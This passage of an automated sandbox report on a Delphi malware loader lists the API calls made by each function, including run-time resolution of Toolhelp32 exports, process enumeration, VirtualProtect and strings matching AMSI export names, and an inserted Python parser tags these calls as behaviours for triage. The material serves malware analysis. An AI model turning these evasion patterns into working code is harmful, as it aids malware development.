                                                                                                                                • Part of subcall function 028A7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,028B38BC,028B5CB2,00000000,028B5D30,?,?,028B38BC), ref: 028A7D66
                                                                                                                                • Part of subcall function 028A7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,028B38BC,028B5CCD,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028A7F73
                                                                                                                              • GetLastError.KERNEL32(00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5CD7
                                                                                                                                • Part of subcall function 028AA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,028AC395,00000000,028AC3EF), ref: 028AA753
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 503785936-0
                                                                                                                              • Opcode ID: 3ec06a220b5348e90b547d7b85cb3a30faf95a4f738a566312f83301489f0b5b
                                                                                                                              • Instruction ID: b3fbe14d1a345e4b2b6c01adc02b04ac2ebf76b3e6bf580a5e6562955a48fb68
                                                                                                                              • Opcode Fuzzy Hash: 3ec06a220b5348e90b547d7b85cb3a30faf95a4f738a566312f83301489f0b5b
                                                                                                                              • Instruction Fuzzy Hash: 8031667CA002089FEB01DBACC8917EDB7B6AF48704F948569E504E7384DB795905CFA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
                                                                                                                              • RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
                                                                                                                              • RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 779948276-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
• RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
• RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
Yara matches
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
• GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
  • Part of subcall function 028B7B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
  • Part of subcall function 028B7B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
  • Part of subcall function 028B7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
Yara matches
Similarity
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
• String ID:
• API String ID: 2543409266-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Yara matches
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
• SysAllocStringLen.OLEAUT32(?,?), ref: 028A4D1F
• SysFreeString.OLEAUT32(00000000), ref: 028A4D31
Yara matches
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(?), ref: 028B7396
Strings
Yara matches
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 028AE73D
  • Part of subcall function 028AE320: VariantClear.OLEAUT32(?), ref: 028AE32F
Yara matches
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Yara matches
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,028B6D75,?,?,?,00000000), ref: 028B6D55
  • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
Yara matches
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028A584A
  • Part of subcall function 028A5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028A0000,028CB790), ref: 028A5AAC
  • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5ACA
  • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5AE8
  • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
  • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
  • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028A5B95,?,80000001), ref: 028A5B6D
  • Part of subcall function 028A5A90: RegCloseKey.ADVAPI32(?,028A5B9C,00000000,?,?,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2796650324-0
                                                                                                                              • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                              • Instruction ID: 84e06be41cad6753b4a1aa1c01a8b0a68c90affd47ab032339f2d90c630e8d87
                                                                                                                              • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                              • Instruction Fuzzy Hash: CBE06D79A002248BDB10DE5C88C0A5733D9AB08754F440961EC68CF246D774D9608BD1
                                                                                                                              Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028A7DB0
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
• Instruction ID: f7d5310df70e6d04538206600e2f8682be6393faffa0744a40718331ae0f24b8
• Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
• Instruction Fuzzy Hash: A7D05B7A3091107AE220955E5C44EBB5BDCCBC9771F14063DB668C3180DB608C018671
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
• Process32First.KERNEL32(?,00000128), ref: 028B9E41
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressProc$FirstHandleModuleProcess32
• String ID:
• API String ID: 2774106396-0
• Opcode ID: e8427c8ebf26f19d6f8087bdb455500fe9def051102d9fdf538cba401f269b3c
• Instruction ID: 74b39019fe5b97d257402501be6e29b3c4d40a8aefda071eaf03f6a991b6af30
• Opcode Fuzzy Hash: e8427c8ebf26f19d6f8087bdb455500fe9def051102d9fdf538cba401f269b3c
• Instruction Fuzzy Hash: DAC08CAA7122305B8F2166F92CC88D7578EDD8A0B730608A2F60DE3302D3658C109AA0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
• Process32Next.KERNEL32(?,00000128), ref: 028B9E61
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModuleNextProcess32
• String ID:
• API String ID: 2237597116-0
• Opcode ID: 81ede38de897f283b9b4ecb9f718eda9502d0f26b4f24009673886857ba39f93
• Instruction ID: 6d1590662e59586ff7bad10d2243af77a6ce53d09d310f1ab2475cde444ae8b3
• Opcode Fuzzy Hash: 81ede38de897f283b9b4ecb9f718eda9502d0f26b4f24009673886857ba39f93
• Instruction Fuzzy Hash: C5C0805A711130578F1065F82CC44D7574DDD490B73054462F60DD3202D3654C105990
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
• Instruction ID: 185a585f4fb335120d17b878280f492bd9e3525b69a323a135f1f7fe6d238989
• Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
• Instruction Fuzzy Hash: E7C08CAD202300067E5061FC0CE801E8388194413D32C0B39B02CD62E2EF2188323861
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,ScanString), ref: 028A7E47
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction ID: f7b36c44e7a80163fcdb1937a2ce4c3d9c8e59394d5316d8ab79b58fca39025d
• Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction Fuzzy Hash: 81C08CEC6023040E7E5062FC1CE02AD828A194493A7282B21E02CE61D2EF1298323821
Uniqueness

Uniqueness Score: -1.00%
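The "APIs" lists above are the most useful part of these per-function records for triage, but reading them by hand across hundreds of functions is slow. The following parser is an added example, written for this page and not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses bullets of the form `API.MODULE(args), ref: address` (with the optional `Part of subcall function XXXX:` prefix) and tags three patterns that recur in the records above: the `Software\Borland\Locales` registry reads, which are the Delphi runtime's locale-override lookup rather than payload behaviour (DBatLoader is a Delphi binary); run-time resolution of the Toolhelp32 exports in function 028B9B94 followed by direct `Process32First`/`Process32Next` calls, i.e. process enumeration; and stack strings at the two `GetFileAttributesA` call sites (`ScanString`, `OpenSession`, `UacScan`, `UacInitialize`, `ScanBuffer`) that match amsi.dll export names with the `Amsi` prefix removed. The tag names and the rule set are this example's own, and the sample lines are copied from the records on this page. The AMSI observation is only that: stack contents at a call site say nothing about how the strings are used, so it is a pointer into the disassembly, not a finding.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox report and tag the
behaviours they imply. Added example; not the report's or Joe Sandbox's code."""
import re
from collections import defaultdict

# One "APIs" bullet: optional subcall prefix, API.MODULE(args), ref: address.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

HKEY_NAMES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# kernel32 exports that function 028B9B94 in the records above resolves at run time.
TOOLHELP = {
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "Process32FirstW",
    "Process32NextW", "Thread32First", "Thread32Next", "Module32First", "Module32Next",
    "Module32FirstW", "Module32NextW", "Heap32ListFirst", "Heap32ListNext",
    "Heap32First", "Heap32Next", "Toolhelp32ReadProcessMemory",
}
# amsi.dll export names without the "Amsi" prefix; the GetFileAttributesA records
# above show several of these as stack contents at the call site (observation only).
AMSI_SUFFIXES = {"Initialize", "Uninitialize", "OpenSession", "CloseSession",
                 "ScanBuffer", "ScanString", "UacInitialize", "UacUninitialize", "UacScan"}

# Sample input: lines copied from the API records on this page (constructed test data).
SAMPLE_API_LINES = r"""
• Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5ACA
• Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028A0000,028CB790), ref: 028A5AE8
• Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
• Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
• Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
• Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
• Process32First.KERNEL32(?,00000128), ref: 028B9E41
• Process32Next.KERNEL32(?,00000128), ref: 028B9E61
• GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028A7DB0
"""


def parse_api_line(line):
    """Return {'api','module','args','ref','subcall'} for one API bullet, else None."""
    line = line.strip().lstrip("•").strip()
    m = API_RE.match(line)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": m.group("ref"), "subcall": m.group("sub")}


def string_args(call):
    """Arguments that are neither '?' (unresolved) nor a 32-bit hex value."""
    return [a for a in call["args"] if a != "?" and not HEX_RE.match(a)]


def tag_calls(calls):
    """Map behaviour tags to (ref, detail) pairs; also return what each subcall resolved."""
    tags = defaultdict(list)
    resolved = defaultdict(set)  # subcall address -> names fetched via GetProcAddress
    for c in calls:
        api, args = c["api"], c["args"]
        if api.startswith("RegOpenKeyEx") and len(args) > 1:
            hive = HKEY_NAMES.get(args[0], args[0])
            if args[1].startswith("Software\\Borland\\"):
                # Delphi RTL locale-override lookup: compiler artefact, not payload behaviour.
                tags["delphi-rtl-locale-lookup"].append((c["ref"], hive + "\\" + args[1]))
        if api == "GetProcAddress" and len(args) > 1 and args[1] in TOOLHELP:
            resolved[c["subcall"]].add(args[1])
            tags["dynamic-import:toolhelp32"].append((c["ref"], args[1]))
        if api in ("Process32First", "Process32Next", "Process32FirstW", "Process32NextW"):
            tags["process-enumeration"].append((c["ref"], api))
        amsi_like = sorted({s for s in string_args(c) if s in AMSI_SUFFIXES})
        if amsi_like:
            tags["amsi-export-names-on-stack"].append((c["ref"], amsi_like))
    return dict(tags), dict(resolved)


def summarize(report_text):
    """Parse every API bullet in report_text and tag it."""
    calls = [c for c in map(parse_api_line, report_text.splitlines()) if c]
    tags, resolved = tag_calls(calls)
    return {"calls": calls, "tags": tags, "resolved": resolved}


if __name__ == "__main__":
    summary = summarize(SAMPLE_API_LINES)
    for tag, hits in summary["tags"].items():
        print(tag)
        for ref, detail in hits:
            print("   ", ref, detail)
```

Run it against the full report text (the "APIs" bullets of every function record) rather than the sample, and the `resolved` map tells you which function does the dynamic import work, so the direct `Process32First`/`Process32Next` callers can be found from their `ref` addresses in the disassembly.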

APIs
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
• Instruction ID: 3b20eb4261908ec6d448a7ab464a4b8a9e752371e6a37718665d199ef57652e7
• Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
• Instruction Fuzzy Hash: 37C012AD64022047FF21965C9CD475562CCDB05395F1400A1D51CD7240EBB0D8008665
Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              • SysReAllocStringLen.OLEAUT32(028C9E50,028BD42C,00000016), ref: 028A4C7A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$AllocFree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 344208780-0
                                                                                                                              • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                              • Instruction ID: c6e80fad9d70c178c914ef5c386e929d064fa0c02ab8b01c2641fbc5a6927c4b
                                                                                                                              • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                              • Instruction Fuzzy Hash: EFD0807C1001015EBF3CA519493493661AEDAD030FB6CDA5D980ECA140EFF5D401CA35
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • timeSetEvent.WINMM(00002710,00000000,028C9B30,00000000,00000001), ref: 028C9B4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventtime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2982266575-0
                                                                                                                              • Opcode ID: 6b8129308f31ce6b414bc89383520a1168d1f58b3ecaaff39b4989f29b20be0a
                                                                                                                              • Instruction ID: d875befc18e757e4e85076d4fca431c2f038b97bd46e2af30c1553dfb9e09398
                                                                                                                              • Opcode Fuzzy Hash: 6b8129308f31ce6b414bc89383520a1168d1f58b3ecaaff39b4989f29b20be0a
                                                                                                                              • Instruction Fuzzy Hash: F3C09BF97A53107EF51055A41CD1F37154DE704700F600455B704DD2C1DAF1A8104774
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 028A4C03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2525500382-0
                                                                                                                              • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                              • Instruction ID: 14260b8d89de0f68d45207f6da2fb18a1ec7a47d645f9567aa1fae815ce63e8e
                                                                                                                              • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                              • Instruction Fuzzy Hash: 89B0123C24820528FE6411660E307B2004C4B90389F8810519E1DC84C1FFC5D002883B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 028A4C1B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                               • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                               • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
